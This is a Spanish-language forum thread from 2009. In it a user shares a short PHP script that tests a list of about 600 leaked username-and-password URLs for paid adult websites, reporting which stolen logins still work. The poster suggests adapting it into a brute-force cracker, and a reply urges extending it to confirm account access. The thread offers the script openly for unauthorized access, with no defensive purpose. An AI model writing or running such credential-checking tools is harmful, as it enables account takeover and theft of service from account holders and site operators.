|
Título: Probador de passwrods para webs Publicado por: USUARIO_DE_SOFTWARE_LIBRE en 11 Abril 2009, 17:30 pm Hola. Me cruzé con un listado de 600 URL's con acceso a webs XXX pagas :P
Ejemplo de las URL's que tengo: Código: http://qlysp1oon:B4k71D8gj2@dominio.com/members/ El usuario es "qlysp1oon" y la pass es "B4k71D8gj2", lo que está después de la "@" es la URL a la que se accederá si colocamos la pass correcta. El problema es que en este listado hay muchas contraseñas que son incorrectas, entonces con un simple script en PHP podemos probar cada URL para saber si funciona :D <?php $a=fopen("NOMBRE DEL ARCHIVO QUE CONTIENE URL'S", "r"); $c=""; while(!feof($a)){ $c.=fread($a, 1024); } fclose($a); $urls=explode("\r\n", $c); foreach($urls as $url){ if(@fopen($url, "r")){ echo "Esta URL es correcta: $url\n"; } } ?> Debes poner el archivo de texto con las URLS en le mismo directorio que el script y escribir el nombre del listado en la primer línea, en donde se indica. Nos mostrará cada URL que es correcta. Modificando un poquito el code podemos hacer un crackeador de fuerza bruta o también muchas otras cosas útiles ;) Saludos! Título: Re: Probador de passwrods para webs Publicado por: дٳŦ٭ en 11 Abril 2009, 22:25 pm Te la pongo mas dificl, haz un php que aparte de validar el formato, haz que valide si la cuenta tiene acceso :P suerte y gracias por compartir el script. Deberías hacerlo funcion y colgarla más arriba en el thread de funciones.
Título: Re: Probador de passwrods para webs Publicado por: USUARIO_DE_SOFTWARE_LIBRE en 11 Abril 2009, 23:22 pm Te la pongo mas dificl, haz un php que aparte de validar el formato, haz que valide si la cuenta tiene acceso :P suerte y gracias por compartir el script. Deberías hacerlo funcion y colgarla más arriba en el thread de funciones. El script no valida el formato.Lo que hace es intentar conectarse con las URLs que hay en un archivo de texto. Si pudo conectarse te lo dirá (claro que también debe ser correcta la contraseña y el usuario, en caso de requerir autentificación).. |